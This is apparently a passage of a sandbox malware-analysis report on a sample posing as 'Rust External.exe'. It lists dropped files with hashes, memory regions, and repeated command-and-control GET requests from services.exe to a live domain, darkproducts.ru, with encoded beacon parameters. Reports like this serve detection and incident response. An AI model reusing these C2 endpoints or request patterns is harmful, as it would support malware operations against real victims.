                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=24I88SuywA5TJ0ttEmKRH2DK49J8xYD1dRdkz2SWNi0oV1CRhYoGiWLyoQto4inAaDJhy0NCag3xauYBgyzmQus13YJQLhKHFwu0uO3TJ5uQ1IB%2FLuLZaonQeO8BUZAJE3QRux91xxhSNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 90832481af0ef1b6-LHR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=47347&min_rtt=31696&rtt_var=23345&sent=14&recv=10&lost=0&retrans=1&sent_bytes=12576&recv_bytes=918&delivery_rate=171084&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              • flag-us
                DNS
                232.194.67.172.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                232.194.67.172.in-addr.arpa
                IN PTR
                Response
              • flag-us
                GET
                http://29358cm.darkproducts.ru/L1nc0In.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai
                services.exe
                Remote address:
                172.67.194.232:80
                Request
                GET /L1nc0In.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai HTTP/1.1
                Accept: */*
                Content-Type: text/csv
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                Host: 29358cm.darkproducts.ru
                Connection: Keep-Alive
                Response
                HTTP/1.1 200 OK
                Date: Sun, 26 Jan 2025 20:09:52 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Last-Modified: Mon, 09 Dec 2024 16:26:02 GMT
                Accept-Ranges: bytes
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9IWH22Be%2FG6GSvmq0J%2FvmlXto8ddNR28uFzrkUq6PTgpnDT9K62bSpiUxi5Q22mcragcsc1XvPwDShhilltZiFh41%2FJORVdPDDSeGzKTn8JIfzzhteWPOeYtRWJYZk10Ct5DQU3EXTEIzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 908324a4ae4ebd7e-LHR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=54857&min_rtt=54857&rtt_var=27428&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=598&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              • flag-us
                GET
                http://29358cm.darkproducts.ru/L1nc0In.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai
                services.exe
                Remote address:
                172.67.194.232:80
                Request
                GET /L1nc0In.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai HTTP/1.1
                Accept: */*
                Content-Type: text/csv
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                Host: 29358cm.darkproducts.ru
                Response
                HTTP/1.1 200 OK
                Date: Sun, 26 Jan 2025 20:09:52 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Last-Modified: Mon, 09 Dec 2024 16:26:02 GMT
                Accept-Ranges: bytes
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3bqe%2FBv6nS%2BKJlWBSDrB3vGFu6bfvUXDUZwJjua%2F%2BaTB4OfaXHMdkyOgEAH%2BP0fBkv6Fv20oZU%2B3L3jOFL0KiKTk1u7bxrhu6E5%2FAPVJzpjZUNtW6e5k8XHE7BQDqnMXu2Ypa56zfcoF5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 908324a799a0bd7e-LHR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=55544&min_rtt=46325&rtt_var=15927&sent=14&recv=10&lost=0&retrans=0&sent_bytes=12571&recv_bytes=1172&delivery_rate=232154&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              • flag-us
                GET
                http://29358cm.darkproducts.ru/L1nc0In.php?CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP
                services.exe
                Remote address:
                172.67.194.232:80
                Request
                GET /L1nc0In.php?CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP HTTP/1.1
                Accept: */*
                Content-Type: text/csv
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                Host: 29358cm.darkproducts.ru
                Connection: Keep-Alive
                Response
                HTTP/1.1 200 OK
                Date: Sun, 26 Jan 2025 20:10:04 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Last-Modified: Mon, 09 Dec 2024 16:26:02 GMT
                Accept-Ranges: bytes
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kvo9iQxoZ%2Bu8CzvzVCwqep2RR1nj%2FmyGFHtrSntUEPVkHDwxFCo39W6FwoDhiVNnir9Ibc2QjaCGykoAlWy9DtcebAg%2BIhGCzM7jLk4g%2BgAysqqYQ7lELHb%2Fr3yiS4rSnFsY%2Fhl3kO3QFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 908324eedb0d7741-LHR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=0&min_rtt=4294967295&rtt_var=750000&sent=1&recv=3&lost=0&retrans=1&sent_bytes=0&recv_bytes=585&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              • flag-us
                GET
                http://29358cm.darkproducts.ru/L1nc0In.php?CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP
                services.exe
                Remote address:
                172.67.194.232:80
                Request
                GET /L1nc0In.php?CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP HTTP/1.1
                Accept: */*
                Content-Type: text/csv
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                Host: 29358cm.darkproducts.ru
                Response
                HTTP/1.1 200 OK
                Date: Sun, 26 Jan 2025 20:10:04 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Last-Modified: Mon, 09 Dec 2024 16:26:02 GMT
                Accept-Ranges: bytes
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EgrjJGFQk1v1So3uVTDb3WQ1fnF5y4l%2FQ%2BC7zDK4HCF0SNjiyqbu01qjxrsWIv2GW%2BsAdpKCDvnJuJir9ARvPS4BpATRkRv6tcdfrr1PWhFRHC2LCp4eI0%2FY9Fzxcu50PePUz3h5h9F95w%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 908324f2df797741-LHR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=82889&min_rtt=55950&rtt_var=33542&sent=14&recv=10&lost=0&retrans=1&sent_bytes=12593&recv_bytes=1146&delivery_rate=133331&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              • 172.67.194.232:80
                http://29358cm.darkproducts.ru/L1nc0In.php?z3yg=JTirXuMZcq4xxpeNiLET0mYvy&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&z3yg=JTirXuMZcq4xxpeNiLET0mYvy
                http
                services.exe
                1.6kB
                26.2kB
                16
                25

                HTTP Request

                GET http://29358cm.darkproducts.ru/L1nc0In.php?z3yg=JTirXuMZcq4xxpeNiLET0mYvy&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&z3yg=JTirXuMZcq4xxpeNiLET0mYvy

                HTTP Response

                200

                HTTP Request

                GET http://29358cm.darkproducts.ru/L1nc0In.php?z3yg=JTirXuMZcq4xxpeNiLET0mYvy&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&z3yg=JTirXuMZcq4xxpeNiLET0mYvy

                HTTP Response

                200
              • 172.67.194.232:80
                http://29358cm.darkproducts.ru/L1nc0In.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai
                http
                services.exe
                1.9kB
                26.2kB
                16
                26

                HTTP Request

                GET http://29358cm.darkproducts.ru/L1nc0In.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai

                HTTP Response

                200

                HTTP Request

                GET http://29358cm.darkproducts.ru/L1nc0In.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai

                HTTP Response

                200
              • 172.67.194.232:80
                http://29358cm.darkproducts.ru/L1nc0In.php?CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP
                http
                services.exe
                2.0kB
                26.3kB
                18
                27

                HTTP Request

                GET http://29358cm.darkproducts.ru/L1nc0In.php?CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP

                HTTP Response

                200

                HTTP Request

                GET http://29358cm.darkproducts.ru/L1nc0In.php?CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP

                HTTP Response

                200
              • 8.8.8.8:53
                133.211.185.52.in-addr.arpa
                dns
                73 B
                147 B
                1
                1

                DNS Request

                133.211.185.52.in-addr.arpa

              • 8.8.8.8:53
                85.49.80.91.in-addr.arpa
                dns
                70 B
                145 B
                1
                1

                DNS Request

                85.49.80.91.in-addr.arpa

              • 8.8.8.8:53
                72.32.126.40.in-addr.arpa
                dns
                71 B
                157 B
                1
                1

                DNS Request

                72.32.126.40.in-addr.arpa

              • 8.8.8.8:53
                7.98.51.23.in-addr.arpa
                dns
                69 B
                131 B
                1
                1

                DNS Request

                7.98.51.23.in-addr.arpa

              • 8.8.8.8:53
                97.17.167.52.in-addr.arpa
                dns
                71 B
                145 B
                1
                1

                DNS Request

                97.17.167.52.in-addr.arpa

              • 8.8.8.8:53
                209.205.72.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                209.205.72.20.in-addr.arpa

              • 8.8.8.8:53
                197.87.175.4.in-addr.arpa
                dns
                71 B
                157 B
                1
                1

                DNS Request

                197.87.175.4.in-addr.arpa

              • 8.8.8.8:53
                241.42.69.40.in-addr.arpa
                dns
                71 B
                145 B
                1
                1

                DNS Request

                241.42.69.40.in-addr.arpa

              • 8.8.8.8:53
                172.210.232.199.in-addr.arpa
                dns
                74 B
                128 B
                1
                1

                DNS Request

                172.210.232.199.in-addr.arpa

              • 8.8.8.8:53
                29358cm.darkproducts.ru
                dns
                services.exe
                69 B
                101 B
                1
                1

                DNS Request

                29358cm.darkproducts.ru

                DNS Response

                172.67.194.232
                104.21.12.142

              • 8.8.8.8:53
                232.194.67.172.in-addr.arpa
                dns
                73 B
                135 B
                1
                1

                DNS Request

                232.194.67.172.in-addr.arpa

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Agentcomponentdriver\PortDll.exe

                Filesize

                2.7MB

                MD5

                36678031ac136dc944f5b836ff267243

                SHA1

                5670ecf38e35121e09bcde5c3fc834d96e290752

                SHA256

                fb7730673d10c85f7496c509e0fef578f30f9ef818e62fd576907b33dc6ce025

                SHA512

                08d79ea3841c60c6f1cb1d946ecd71812bd19155246f10029afa09d283c098b57e5743d6978675be15638db8a8b68828842dd49c84a970f389a30cb10c161fda

              • C:\Agentcomponentdriver\cF2nsYK.vbe

                Filesize

                224B

                MD5

                58f14b1ab2fe69675f2092835a963260

                SHA1

                3a5c88e3f551cdfb6d7053f374f475f65250a342

                SHA256

                d3aba5d7c01e3f8de8969d52e11aeab5777abf679cf305a3e78bf42f42515283

                SHA512

                82f3bbb05f13fd062d81862a30f203bc4ca6bcd643a85e3a393bfe5ae77e602fcb2daa0004a29c757c38cbb4c0807316c933f9e0802dba2701363e92566597da

              • C:\Agentcomponentdriver\gyWUCXXRJzCMxdWE9QlvhicilMz.bat

                Filesize

                149B

                MD5

                61f83fd24fdcd1acc1b20155cf97dcd8

                SHA1

                e21ecbd09f4c98a591f15f6e64cba7b65fd165f5

                SHA256

                1725ca5841f1f224c9d9e335530e1c805fa838f873e8316db7ff8cc4ffd76120

                SHA512

                8e1851ce4ab75fbd7286192026904f965f9952fbc0fa9dd3ddc3cd06f1907231d2e977c63a534de618f497d22e1e960bb9edada8c46409ef25e151da6045c6b5

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PortDll.exe.log

                Filesize

                1KB

                MD5

                655010c15ea0ca05a6e5ddcd84986b98

                SHA1

                120bf7e516aeed462c07625fbfcdab5124ad05d3

                SHA256

                2b1ffeab025cc7c61c50e3e2e4c9253046d9174cf00181a8c1de733a4c0daa14

                SHA512

                e52c26718d7d1e979837b5ac626dde26920fe7413b8aa7be6f1be566a1b0f035582f4d313400e3ad6b92552abb1dfaf186b60b875fb955a2a94fd839fe841437

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.log

                Filesize

                1KB

                MD5

                49b64127208271d8f797256057d0b006

                SHA1

                b99bd7e2b4e9ed24de47fb3341ea67660b84cca1

                SHA256

                2a5d403a2e649d8eceef8f785eeb0f6d33888ec6bbf251b3c347e34cb32b1e77

                SHA512

                f7c728923c893dc9bc88ad2159e0abcda41e1b40ff7e7756e6252d135ed238a2248a2662b3392449836dd1b0b580f0c866cc33e409527484fe4602e3d3f10e3e

              • C:\Users\Admin\AppData\Local\Temp\36f4394c-bc31-4c88-aa13-67d0f187b9e5.vbs

                Filesize

                710B

                MD5

                312919d827e3efde7feaf64211fb6889

                SHA1

                459ce79fc151669455b4137a31c1e539c473d36c

                SHA256

                97820fc9a2a5d2e6075d328c99856f456e9335dd31075f51f80a656e6ff6f01e

                SHA512

                26b2ae91031372e84f2dd50c7edb1b4275e1c559ab30542f377529fbc4e55379b5285ac193ea3d88558f45db83a983466f06c75bbe8daa0c2bd3f12cb91bb2db

              • C:\Users\Admin\AppData\Local\Temp\6bbac697-2e07-4ead-8da0-d093ab0a0e98.vbs

                Filesize

                710B

                MD5

                80e3856b56688aad8dc758d29ed4aeae

                SHA1

                1331692eed5591f5c1ad224ce571f4e5fc88cbad

                SHA256

                eef7a40069ddc9771d1c3eb480f16635f983fee01a0ba91ba2c5dc5697a974bb

                SHA512

                7ae9504254491e0c166d3239f40fec935cf21528958a7f93ee6b8531a4a5c90bb01057bf9d1dd581b1acbf78d73092bed60d7b47085f868d102f368bf4b365e5

              • C:\Users\Admin\AppData\Local\Temp\6dcd6085-0ac4-4210-aedb-7337dfc48147.vbs

                Filesize

                486B

                MD5

                7fc6c02cd3ff6d15779a47261dbc92b9

                SHA1

                83bdd3760e3e166826f0cb242a04a113cb198b5c

                SHA256

                9c496a40b2f5d9fd0ead2b89b05570b2cb745a3d1424e54b99c4f61134f002c0

                SHA512

                c20880b6440e9448650db938d4edbbde239b63dcb8426a073ddaca4d819099a1454edf1f855db72bbc100132c42877951a5ecccabf1596ebdd3e675ce55f470d

              • C:\Users\Admin\AppData\Local\Temp\6ef5a38b-c1c4-4630-8c9b-7b738a718e49.vbs

                Filesize

                710B

                MD5

                95592fea86bb28bec6136d950919296b

                SHA1

                d93b8912380fff21906f891fcb4cdf06b30ba0d3

                SHA256

                4ba52a7ecb1c34625b57635682b21407d283336b44979bdd6c221843ce0cafbc

                SHA512

                cf10710bcda9dcf817c951ddcb3be7e43de6b78b584d526a1bb06a2777393438137f92fafb8b9c2f04bc21c3b39056c80f1b288ef95ea9ea1cbac0b0576e47d2

              • C:\Users\Admin\AppData\Local\Temp\7zO863B5CC7\Rust External.exe

                Filesize

                3.0MB

                MD5

                052d8274e7bd005fabb352b5e5789cd9

                SHA1

                853421783272ff3bf84999956703f56a9ef6b281

                SHA256

                656a8bc85180846d696a852121d269f793861c370c1c4c82e9962916c8a5b502

                SHA512

                c8d0f08dbc22e85bf292905a07ea2d67359ba25c6a601e3d5998ae39a1487df98e070dc0e6a933bf0d33dd41d18a9ae9a75834f3163ec18cf0aa147088eb922d

              • C:\Users\Admin\AppData\Local\Temp\9c5aa798322712a26523b2ce90e185a52b9bb2f6.exe

                Filesize

                2.7MB

                MD5

                48db8cf594c31a6f0d488db47c08e60e

                SHA1

                8408fb8ce20405fc5f15b8b8f5328ce99a644cff

                SHA256

                d8a05689c808d3db1bed33f848060b5e7681b953810f8001fd613754172ba3c4

                SHA512

                b6e6aaeae274c9e1d9635b596b4bf87afd761fcbc0d19888678ca01197c62d06935e56e0221815fa830b77d96632e2a8815c631fa765153185728b56af071259

              • C:\Users\Admin\AppData\Local\Temp\KjrLCSMPDQ.bat

                Filesize

                199B

                MD5

                b5b6e811b247e91b5a6802a432cd74c4

                SHA1

                072451fe8bb95b568f4c900b730db07ca5da82cc

                SHA256

                ba6a3bfe475f67f889eb139ef040ec52d5aad20a0ddaa25dfefc3467791f83d4

                SHA512

                45b2eaa3a7d07dc7a0bb28dddd9a7bfb8f84dbdf07502ee21d2e55d5136736198d81a5fdaed204a0e12d516d9ee742750880486ff9df04f340446766d3c773b4

              • memory/2592-83-0x000000001D3F0000-0x000000001D402000-memory.dmp

                Filesize

                72KB

              • memory/3300-27-0x000000001BE10000-0x000000001BE1A000-memory.dmp

                Filesize

                40KB

              • memory/3300-39-0x000000001C630000-0x000000001C638000-memory.dmp

                Filesize

                32KB

              • memory/3300-33-0x000000001C420000-0x000000001C42C000-memory.dmp

                Filesize

                48KB

              • memory/3300-38-0x000000001C470000-0x000000001C47E000-memory.dmp

                Filesize

                56KB

              • memory/3300-37-0x000000001C460000-0x000000001C468000-memory.dmp

                Filesize

                32KB

              • memory/3300-36-0x000000001C450000-0x000000001C45E000-memory.dmp

                Filesize

                56KB

              • memory/3300-35-0x000000001C440000-0x000000001C44A000-memory.dmp

                Filesize

                40KB

              • memory/3300-34-0x000000001C430000-0x000000001C438000-memory.dmp

                Filesize

                32KB

              • memory/3300-32-0x000000001BE90000-0x000000001BE98000-memory.dmp

                Filesize

                32KB

              • memory/3300-40-0x000000001C640000-0x000000001C64A000-memory.dmp

                Filesize

                40KB

              • memory/3300-41-0x000000001C650000-0x000000001C65C000-memory.dmp

                Filesize

                48KB

              • memory/3300-31-0x000000001C950000-0x000000001CE78000-memory.dmp

                Filesize

                5.2MB

              • memory/3300-30-0x000000001BE80000-0x000000001BE92000-memory.dmp

                Filesize

                72KB

              • memory/3300-29-0x000000001BE20000-0x000000001BE2C000-memory.dmp

                Filesize

                48KB

              • memory/3300-28-0x000000001C3B0000-0x000000001C406000-memory.dmp

                Filesize

                344KB

              • memory/3300-25-0x000000001BDE0000-0x000000001BDE8000-memory.dmp

                Filesize

                32KB

              • memory/3300-26-0x000000001BDF0000-0x000000001BE06000-memory.dmp

                Filesize

                88KB

              • memory/3300-21-0x0000000000DF0000-0x00000000010A6000-memory.dmp

                Filesize

                2.7MB

              • memory/3300-24-0x000000001BE30000-0x000000001BE80000-memory.dmp

                Filesize

                320KB

              • memory/3300-23-0x000000001BDC0000-0x000000001BDDC000-memory.dmp

                Filesize

                112KB

              • memory/3300-22-0x000000001BDB0000-0x000000001BDBE000-memory.dmp

                Filesize

                56KB

              • memory/3412-110-0x000000001C3F0000-0x000000001C402000-memory.dmp

                Filesize

                72KB

              • memory/3568-98-0x000000001BFF0000-0x000000001C002000-memory.dmp

                Filesize

                72KB

              We care about your privacy.

              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.